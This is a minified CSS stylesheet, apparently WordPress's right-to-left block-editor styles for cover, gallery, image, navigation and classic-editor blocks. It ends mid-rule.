.page-numbers{margin-left:2px}.wp-block-comments-pagination-numbers .page-numbers:last-child{margin-right:0}.wp-block-comments-title.has-background{padding:inherit}.wp-block-cover.is-placeholder{align-items:stretch;display:flex;min-height:240px;padding:0!important}.wp-block-cover.is-placeholder .components-placeholder.is-large{justify-content:flex-start;z-index:1}.wp-block-cover.is-placeholder:focus:after{min-height:auto}.wp-block-cover.components-placeholder h2{color:inherit}.wp-block-cover.is-transient{position:relative}.wp-block-cover.is-transient:before{background-color:#fff;content:"";height:100%;opacity:.3;position:absolute;width:100%;z-index:1}.wp-block-cover.is-transient .wp-block-cover__inner-container{z-index:2}.wp-block-cover .components-spinner{margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}.wp-block-cover .wp-block-cover__inner-container{margin-left:0;margin-right:0;text-align:right}.wp-block-cover .wp-block-cover__placeholder-background-options{width:100%}.wp-block-cover .wp-block-cover__image--placeholder-image{bottom:0;left:0;position:absolute;right:0;top:0}[data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{max-width:420px;width:100%}.block-library-cover__reset-button{margin-right:auto}.block-library-cover__resize-container{bottom:0;left:0;min-height:50px;position:absolute!important;right:0;top:0}.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{overflow:visible;pointer-events:none}.block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{background-attachment:scroll}.color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){margin-top:24px}.wp-block-details summary div{display:inline}.wp-block-embed{clear:both;margin-left:0;margin-right:0}.wp-block-embed.is-loading{display:flex;justify-content:center}.wp-block-embed .wp-block-embed__placeholder-input{flex:1 1 auto}.wp-block-embed .components-placeholder__error{word-break:break-word}.wp-block-post-content .wp-block-embed__learn-more a{color:var(--wp-admin-theme-color)}.block-library-embed__interactive-overlay{bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{max-width:360px;width:100%}.wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{min-width:280px}.wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{height:auto}.wp-block[data-align=center]>.wp-block-file{text-align:center}.wp-block-file{align-items:center;display:flex;flex-wrap:wrap;justify-content:space-between;margin-bottom:0}.wp-block-file .components-resizable-box__container{margin-bottom:1em}.wp-block-file .wp-block-file__preview{height:100%;margin-bottom:1em;width:100%}.wp-block-file .wp-block-file__preview-overlay{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-file .wp-block-file__content-wrapper{flex-grow:1}.wp-block-file a{min-width:1em}.wp-block-file a:not(.wp-block-file__button){display:inline-block}.wp-block-file .wp-block-file__button-richtext-wrapper{display:inline-block;margin-right:.75em}.wp-block-form-input .is-input-hidden{background:repeating-linear-gradient(-45deg,#0000,#0000 5px,currentColor 0,currentColor 6px);border:1px dashed;box-sizing:border-box;font-size:.85em;opacity:.3;padding:.5em}.wp-block-form-input .is-input-hidden input[type=text]{background:#0000}.wp-block-form-input.is-selected .is-input-hidden{background:none;opacity:1}.wp-block-form-input.is-selected .is-input-hidden input[type=text]{background:unset}.wp-block-form-submission-notification>*{background:repeating-linear-gradient(-45deg,#0000,#0000 5px,currentColor 0,currentColor 6px);border:1px dashed;box-sizing:border-box;opacity:.25}.wp-block-form-submission-notification.is-selected>*,.wp-block-form-submission-notification:has(.is-selected)>*{background:none;opacity:1}.wp-block-form-submission-notification.is-selected:after,.wp-block-form-submission-notification:has(.is-selected):after{display:none!important}.wp-block-form-submission-notification:after{align-items:center;display:flex;font-size:1.1em;height:100%;justify-content:center;position:absolute;right:0;top:0;width:100%}.wp-block-form-submission-notification.form-notification-type-success:after{content:attr(data-message-success)}.wp-block-form-submission-notification.form-notification-type-error:after{content:attr(data-message-error)}.wp-block-freeform.block-library-rich-text__tinymce{height:auto}.wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{line-height:1.8}.wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{margin-right:0;padding-right:2.5em}.wp-block-freeform.block-library-rich-text__tinymce blockquote{border-right:4px solid #000;box-shadow:inset 0 0 0 0 #ddd;margin:0;padding-right:1em}.wp-block-freeform.block-library-rich-text__tinymce pre{color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:15px;white-space:pre-wrap}.wp-block-freeform.block-library-rich-text__tinymce>:first-child{margin-top:0}.wp-block-freeform.block-library-rich-text__tinymce>:last-child{margin-bottom:0}.wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce a{color:var(--wp-admin-theme-color)}.wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{background:#e5f5fa;border-radius:2px;box-shadow:0 0 0 1px #e5f5fa;margin:0 -2px;padding:0 2px}.wp-block-freeform.block-library-rich-text__tinymce code{background:#f0f0f0;border-radius:2px;color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:14px;padding:2px}.wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{background:#ddd}.wp-block-freeform.block-library-rich-text__tinymce .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-freeform.block-library-rich-text__tinymce .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-freeform.block-library-rich-text__tinymce .aligncenter{display:block;margin-left:auto;margin-right:auto}.wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC);background-position:50%;background-repeat:no-repeat;background-size:1900px 20px;cursor:default;display:block;height:20px;margin:15px auto;outline:0;width:96%}.wp-block-freeform.block-library-rich-text__tinymce img::selection{background-color:initial}.wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{-ms-user-select:element}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{margin:0;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{display:block}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{-webkit-user-drag:none}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{margin:0;padding-top:.5em}.wp-block-freeform.block-library-rich-text__tinymce .wpview{border:1px solid #0000;clear:both;margin-bottom:16px;position:relative;width:99.99%}.wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{background:#0000;display:block;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{display:none}.wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{border:1px dashed #ddd;padding:10px}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{border:1px solid #ddd;margin:0;padding:1em 0;word-wrap:break-word}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{margin:0;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{border-color:#0000}.wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{display:block;font-size:32px;height:32px;margin:0 auto;width:32px}.wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{clear:both;content:"";display:table}.wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce .gallery a{cursor:default}.wp-block-freeform.block-library-rich-text__tinymce .gallery{line-height:1;margin:auto -6px;overflow-x:hidden;padding:6px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{box-sizing:border-box;float:right;margin:0;padding:6px;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{margin:0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{font-size:13px;margin:4px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{width:100%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{width:50%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{width:33.3333333333%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{width:25%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{width:20%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{width:16.6666666667%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{width:14.2857142857%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{width:12.5%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{width:11.1111111111%}.wp-block-freeform.block-library-rich-text__tinymce .gallery img{border:none;height:auto;max-width:100%;padding:0}div[data-type="core/freeform"]:before{border:1px solid #ddd;outline:1px solid #0000}@media not (prefers-reduced-motion){div[data-type="core/freeform"]:before{transition:border-color .1s linear,box-shadow .1s linear}}div[data-type="core/freeform"].is-selected:before{border-color:#1e1e1e}div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{margin-top:0;padding-top:0}div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{clear:both;content:"";display:table}.mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{color:#1e1e1e}.mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{margin-left:0;margin-right:8px}.mce-toolbar-grp .mce-btn i{font-style:normal}.block-library-classic__toolbar{border:1px solid #ddd;border-bottom:none;border-radius:2px;display:none;margin:0 0 8px;padding:0;position:sticky;top:0;width:auto;z-index:31}div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{border-color:#1e1e1e;display:block}.block-library-classic__toolbar .mce-tinymce{box-shadow:none}@media (min-width:600px){.block-library-classic__toolbar{padding:0}}.block-library-classic__toolbar:empty{background:#f5f5f5;border-bottom:1px solid #e2e4e7;display:block}.block-library-classic__toolbar:empty:before{color:#555d66;content:attr(data-placeholder);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:37px;padding:14px}.block-library-classic__toolbar div.mce-toolbar-grp{border-bottom:1px solid #1e1e1e}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{height:auto!important;width:100%!important}.block-library-classic__toolbar .mce-container-body.mce-abs-layout{overflow:visible}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{position:static}.block-library-classic__toolbar .mce-toolbar-grp>div{padding:1px 3px}.block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){display:none}.block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{display:block}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{height:50vh!important}@media (min-width:960px){.block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){height:9999rem}.block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{height:100%}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{height:calc(100% - 52px)}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{display:flex;flex-direction:column;height:100%;min-width:50vw}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{display:flex;flex-direction:column;flex-grow:1}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{flex-grow:1;height:10px!important}}.block-editor-freeform-modal__actions{margin-top:16px}:root :where(figure.wp-block-gallery){display:block}:root :where(figure.wp-block-gallery)>.blocks-gallery-caption{flex:0 0 100%}:root :where(figure.wp-block-gallery)>.blocks-gallery-media-placeholder-wrapper{flex-basis:100%}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice.is-error{display:block}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__content{margin:4px 0}:root :where(figure.wp-block-gallery) .wp-block-image .components-notice__dismiss{left:5px;position:absolute;top:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .components-placeholder__label{display:none}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{margin-bottom:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder{margin:0}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder .components-placeholder__label{display:flex}:root :where(figure.wp-block-gallery) .block-editor-media-placeholder figcaption{z-index:2}:root :where(figure.wp-block-gallery) .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.gallery-settings-buttons .components-button:first-child{margin-left:8px}.blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{outline:none}.blocks-gallery-item figure.is-selected:before{bottom:0;box-shadow:0 0 0 1px #fff inset,0 0 0 3px var(--wp-admin-theme-color) inset;content:"";left:0;outline:2px solid #0000;pointer-events:none;position:absolute;right:0;top:0;z-index:1}.blocks-gallery-item figure.is-transient img{opacity:.3}.blocks-gallery-item .block-editor-media-placeholder{height:100%;margin:0}.blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{display:flex}.wp-block-gallery ul.blocks-gallery-grid{margin:0;padding:0}@media (min-width:600px){.wp-block-update-gallery-modal{max-width:480px}}.wp-block-update-gallery-modal-buttons{display:flex;gap:12px;justify-content:flex-end}.wp-block-group .block-editor-block-list__insertion-point{left:0;right:0}[data-type="core/group"].is-selected .block-list-appender{margin-left:0;margin-right:0}[data-type="core/group"].is-selected .has-background .block-list-appender{margin-bottom:18px;margin-top:18px}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{gap:inherit}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{display:inherit;flex:1;flex-direction:inherit;width:100%}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{border:1px dashed;content:"";display:flex;flex:1 0 40px;min-height:38px;pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{pointer-events:none}.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-button-block-appender,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{pointer-events:all}.block-library-html__edit .block-library-html__preview-overlay{height:100%;position:absolute;right:0;top:0;width:100%}.block-library-html__edit .block-editor-plain-text{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;display:block;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important}@media (min-width:600px){.block-library-html__edit .block-editor-plain-text{font-size:13px!important}}.block-library-html__edit .block-editor-plain-text:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid #0000!important}.block-library-html__edit .block-editor-plain-text{direction:ltr}.wp-block-image.wp-block-image .block-editor-media-placeholder.is-small{min-height:60px}figure.wp-block-image:not(.wp-block){margin:0}.wp-block-image{position:relative}.wp-block-image .is-applying img,.wp-block-image.is-transient img{opacity:.3}.wp-block-image figcaption img{display:inline}.wp-block-image .components-spinner{margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}.wp-block-image__placeholder{aspect-ratio:4/3}.wp-block-image__placeholder.has-illustration:before{background:#fff;opacity:.8}.wp-block-image__placeholder .components-placeholder__illustration{opacity:.1}.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{left:0;margin:-1px 0;position:absolute;right:0}@media (min-width:600px){.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{margin:-1px}}[data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{height:auto;width:100%}.wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{display:table}.wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{caption-side:bottom;display:table-caption}.wp-block[data-align=left]>.wp-block-image{margin:.5em 0 .5em 1em}.wp-block[data-align=right]>.wp-block-image{margin:.5em 1em .5em 0}.wp-block[data-align=center]>.wp-block-image{margin-left:auto;margin-right:auto;text-align:center}.wp-block[data-align]:has(>.wp-block-image){position:relative}.wp-block-image__crop-area{max-width:100%;overflow:hidden;position:relative;width:100%}.wp-block-image__crop-area .reactEasyCrop_Container{pointer-events:auto}.wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{border:none;border-radius:0}.wp-block-image__crop-icon{align-items:center;display:flex;justify-content:center;min-width:48px;padding:0 8px}.wp-block-image__crop-icon svg{fill:currentColor}.wp-block-image__zoom .components-popover__content{min-width:260px;overflow:visible!important}.wp-block-image__toolbar_content_textarea__container{padding:8px}.wp-block-image__toolbar_content_textarea{width:250px}.wp-block-latest-posts>li{overflow:hidden}.wp-block-latest-posts li a>div{display:inline}:root :where(.wp-block-latest-posts){padding-right:2.5em}:root :where(.wp-block-latest-posts.is-grid),:root :where(.wp-block-latest-posts__list){padding-right:0}.wp-block-math__textarea-control textarea{direction:ltr;font-family:Menlo,Consolas,monaco,monospace}.wp-block-media-text__media{position:relative}.wp-block-media-text__media.is-transient img{opacity:.3}.wp-block-media-text__media .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.wp-block-media-text .__resizable_base__{grid-column:1/span 2;grid-row:2}.wp-block-media-text .editor-media-container__resizer{width:100%!important}.wp-block-media-text.is-image-fill .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill .editor-media-container__resizer,.wp-block-media-text.is-image-fill-element .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill-element .editor-media-container__resizer{height:100%!important}.wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{max-width:unset}.wp-block-media-text--placeholder-image{min-height:205px}.block-editor-block-list__block[data-type="core/more"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-more{display:block;text-align:center;white-space:nowrap}.wp-block-more .rich-text{background:#fff;color:#757575;display:inline-flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;padding:10px 36px;position:relative;text-align:center;text-transform:uppercase;white-space:nowrap}.wp-block-more:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}.editor-styles-wrapper .wp-block-navigation ul{margin-bottom:0;margin-right:0;margin-top:0;padding-right:0}.editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{margin:revert}.wp-block-navigation-item__label{display:inline}.wp-block-navigation-item,.wp-block-navigation__container{background-color:inherit}.wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{opacity:0;visibility:hidden}.has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{display:flex;opacity:1;visibility:visible}.is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{opacity:1;visibility:visible}.is-editing>.wp-block-navigation__container{display:flex;flex-direction:column;opacity:1;visibility:visible}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{opacity:1;visibility:hidden}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{visibility:visible}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender{display:block;position:static;width:100%}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{background:#1e1e1e;color:#fff;margin-left:0;margin-right:auto;padding:0;width:24px}.wp-block-navigation__submenu-container .block-list-appender{display:none}.block-library-colors-selector{width:auto}.block-library-colors-selector .block-library-colors-selector__toggle{display:block;margin:0 auto;padding:3px;width:auto}.block-library-colors-selector .block-library-colors-selector__icon-container{align-items:center;border-radius:4px;display:flex;height:30px;margin:0 auto;padding:3px;position:relative}.block-library-colors-selector .block-library-colors-selector__state-selection{border-radius:11px;box-shadow:inset 0 0 0 1px #0003;height:22px;line-height:20px;margin-left:auto;margin-right:auto;min-height:22px;min-width:22px;padding:2px;width:22px}.block-library-colors-selector .block-library-colors-selector__state-selection>svg{min-width:auto!important}.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{color:inherit}.block-library-colors-selector__popover .color-palette-controller-container{padding:16px}.block-library-colors-selector__popover .components-base-control__label{height:20px;line-height:20px}.block-library-colors-selector__popover .component-color-indicator{float:left;margin-top:2px}.block-library-colors-selector__popover .components-panel__body-title{display:none}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{background-color:#1e1e1e;color:#fff;height:24px}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{padding:0}.wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{background-color:initial;color:#1e1e1e}.components-placeholder.wp-block-navigation-placeholder{background:none;box-shadow:none;min-height:0;outline:none;padding:0}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{font-size:inherit}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{margin-bottom:0}.components-placeholder.wp-block-navigation-placeholder{color:inherit}.wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{color:#1e1e1e}.wp-block-navigation-placeholder__preview{align-items:center;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;min-width:96px}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{display:none}.wp-block-navigation-placeholder__preview{background:#0000;color:currentColor}.wp-block-navigation-placeholder__preview:before{border:1px dashed;border-radius:inherit;bottom:0;content:"";display:block;left:0;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview>svg{fill:currentColor}.wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{min-height:90px}.wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{min-height:132px}.wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{align-items:flex-start;flex-direction:row;padding:6px 8px}.wp-block-navigation-placeholder__controls{background-color:#fff;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;display:none;position:relative;z-index:1}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{display:flex}.wp-block-navigation-placeholder__controls{float:right;width:100%}.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{display:none}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{align-items:flex-start;flex-direction:column}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{display:none}.wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{height:36px;margin-left:12px}.wp-block-navigation-placeholder__actions__indicator{align-items:center;display:flex;height:36px;justify-content:flex-start;line-height:0;margin-right:4px;padding:0 0 0 6px}.wp-block-navigation-placeholder__actions__indicator svg{margin-left:4px;fill:currentColor}.wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{flex-direction:row!important}.wp-block-navigation-placeholder__actions{align-items:center;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;gap:6px}.wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{margin-left:0}.wp-block-navigation-placeholder__actions{height:100%}.wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{background-color:#1e1e1e;border:0;height:100%;margin:auto 0;max-height:16px;min-height:1px;min-width:1px}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{display:none}}.wp-block-navigation__responsive-container.is-menu-open{position:fixed;top:159px}@media (min-width:782px){.wp-block-navigation__responsive-container.is-menu-open{right:36px;top:97px}}@media (min-width:960px){.wp-block-navigation__responsive-container.is-menu-open{right:160px}}.is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:145px}.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{right:0;top:159px}@media (min-width:782px){.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{top:65px}}.is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:113px}body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{bottom:0;left:0;right:0;top:0}.components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{color:inherit;height:auto;padding:0}.components-heading.wp-block-navigation-off-canvas-editor__title{margin:0}.wp-block-navigation-off-canvas-editor__header{margin-bottom:8px}.is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{margin-top:16px}@keyframes fadein{0%{opacity:0}to{opacity:1}}.wp-block-navigation__loading-indicator-container{padding:8px 12px}.wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{margin-top:0}@keyframes fadeouthalf{0%{opacity:1}to{opacity:.5}}.wp-block-navigation-delete-menu-button{justify-content:center;margin-bottom:16px;width:100%}.components-button.is-link.wp-block-navigation-manage-menus-button{margin-bottom:16px}.wp-block-navigation__overlay-menu-preview{align-items:center;background-color:#f0f0f0;display:flex;grid-column:span 2;height:64px!important;justify-content:space-between;padding:0 24px;width:100%}.wp-block-navigation__overlay-menu-preview.open{background-color:#fff;box-shadow:inset 0 0 0 1px #e0e0e0;outline:1px solid #0000}.wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{display:none}.wp-block-navigation__navigation-selector{margin-bottom:16px;width:100%}.wp-block-navigation__navigation-selector-button{border:1px solid;justify-content:space-between;width:100%}.wp-block-navigation__navigation-selector-button__icon{flex:0 0 auto}.wp-block-navigation__navigation-selector-button__label{flex:0 1 auto;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.wp-block-navigation__navigation-selector-button--createnew{border:1px 